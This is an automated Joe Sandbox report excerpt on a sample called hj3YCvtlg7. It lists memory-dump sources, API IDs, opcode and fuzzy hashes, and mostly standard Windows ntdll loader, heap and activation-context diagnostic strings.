                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                                                              • Instruction ID: 004607ab2a9e9a6b3538d07686916e66172f62f4b7a9503426b8375871ffdb93
                                                                                              • Opcode Fuzzy Hash: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                                                              • Instruction Fuzzy Hash: 76E08671645244BBD720DB58CC84ED33F66DF59250F19C15AB94EAB751C930D901C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                              • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                              • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                              • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                                                                              • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                              • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2160512332
                                                                                              • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                              • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                                                                              • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                              • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Thread identifier, xrefs: 0179553A
                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                              • corrupted critical section, xrefs: 017954C2
                                                                                              • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                              • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                              • Critical section address., xrefs: 01795502
                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                              • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                              • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                              • double initialized or corrupted critical section, xrefs: 01795508
                                                                                              • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                              • 8, xrefs: 017952E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                              • API String ID: 0-2368682639
                                                                                              • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                              • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                                                                              • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                              • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                              • @, xrefs: 0179259B
                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                              • API String ID: 0-4009184096
                                                                                              • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                              • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                                                                              • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                              • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                              • API String ID: 0-2515994595
                                                                                              • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                              • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                                                              • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                              • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                              • API String ID: 0-1700792311
                                                                                              • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                              • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                                                              • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                              • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                              • VerifierFlags, xrefs: 017A8C50
                                                                                              • VerifierDebug, xrefs: 017A8CA5
                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                              • VerifierDlls, xrefs: 017A8CBD
                                                                                              • HandleTraces, xrefs: 017A8C8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                              • API String ID: 0-3223716464
                                                                                              • Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                                                              • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                                                              • Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                                                              • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                              • API String ID: 0-1109411897
                                                                                              • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                              • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                                                                              • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                              • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-792281065
                                                                                              • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                              • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                                                              • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                              • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • apphelp.dll, xrefs: 01716496
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                              • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-204845295
                                                                                              • Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                                                              • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                                                                              • Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                                                              • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                              • API String ID: 0-861424205
                                                                                              • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                              • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                                                              • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                              • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                              • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-475462383
                                                                                              • Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                                                              • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                                                              • Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                                                              • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 1404860816-0
                                                                                              • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                              • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                                                              • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                              • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                              • API String ID: 0-379654539
                                                                                              • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                              • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                                                              • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                              • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • LdrpInitializeProcess, xrefs: 01758422
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                              • @, xrefs: 01758591
                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1918872054
                                                                                              • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                              • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                                                                              • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                              • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                              • .Local, xrefs: 017528D8
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                              • API String ID: 0-1239276146
                                                                                              • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                              • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                                                              • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                              • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                              • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                              • API String ID: 0-1245972979
                                                                                              • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                              • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                                                              • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                              • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                              • API String ID: 0-1468400865
